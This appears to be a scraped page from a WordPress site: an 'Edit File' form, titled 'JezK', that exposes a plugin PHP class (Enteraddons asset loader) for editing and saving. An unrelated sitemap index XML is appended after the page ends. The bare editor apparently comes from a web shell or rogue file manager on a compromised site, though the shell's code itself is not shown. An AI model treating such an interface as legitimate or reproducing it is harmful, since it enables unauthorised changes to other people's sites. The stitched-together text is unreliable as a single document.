
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: Editor_Widgets_Assets_Base.php</h2><form method="post"><textarea name="file_content" rows="10" cols="50">&lt;?php
namespace Enteraddons\Classes;

/**
 * Enteraddons helper class
 *
 * @package     Enteraddons
 * @author      ThemeLooks
 * @copyright   2022 ThemeLooks
 * @license     GPL-2.0-or-later
 *
 *
 */

if( !defined( &#039;WPINC&#039; ) ) {
    die;
}

abstract class Editor_Widgets_Assets_Base {

	protected  $dirUrl;
	protected  $dirPath;
	protected  $packageVersion;
	protected  $pluginMode;
	protected  $prefix;

	function __construct() {
		$this-&gt;prefix = $this-&gt;getPrefix();
		$this-&gt;dirUrl = $this-&gt;getDirUrl();
		$this-&gt;dirPath = $this-&gt;getDirPath();
		$this-&gt;packageVersion = $this-&gt;getPackageVersion();
		$this-&gt;pluginMode = $this-&gt;getPluginMode();

		add_action( &#039;elementor/frontend/after_enqueue_styles&#039;, [ $this, &#039;editor_widgets_scripts&#039; ], 10, 1 );

	}

	public function getPrefix(){}

	public function getDirPath(){}

	public function getDirUrl(){}

	public function getPackageVersion(){}

	public function getPluginMode(){}

	public  function editor_widgets_scripts() {

		if( $this-&gt;pluginMode == &#039;DEV&#039; ) {
			// This is work on DEV mode
			$this-&gt;getEditModeWidgetsCSSFiles();
		} else {
			// This is work on PRODUCTION mode
			$this-&gt;getEditModeWidgetsCSS();
		}
	}

	public  function getEditModeWidgetsCSSFiles() {

		if( \Enteraddons\Classes\Helper::is_elementor_edit_mode() ) {
			$dir = $this-&gt;dirPath.&quot;assets&quot;.DIRECTORY_SEPARATOR.&quot;widgets-css&quot;.DIRECTORY_SEPARATOR.&quot;css&quot;.DIRECTORY_SEPARATOR;
			$files = array_diff( scandir( $dir ), array( &#039;.&#039;, &#039;..&#039; ) );
			if( is_array( $files ) &amp;&amp; !empty( $files ) )  {
				foreach( $files as $file ) {
					if( file_exists($dir.$file) ) {
						wp_enqueue_style( &#039;widget-&#039;.esc_attr(uniqid()), $this-&gt;dirUrl.&#039;assets/widgets-css/css/&#039;.$file, array(), $this-&gt;packageVersion, false );
					}
				}
			}
		}
	}

	public  function getEditModeWidgetsCSS() {
		if( \Enteraddons\Classes\Helper::is_elementor_edit_mode() ) {
			wp_enqueue_style( $this-&gt;prefix.&#039;edit-mode-widget&#039;, $this-&gt;dirUrl.&#039;assets/css/&#039;.$this-&gt;prefix.&#039;edit-mode-widgets.css&#039;, array(), $this-&gt;packageVersion, false );
		}
	}

}
</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://looker.af/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://looker.af/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
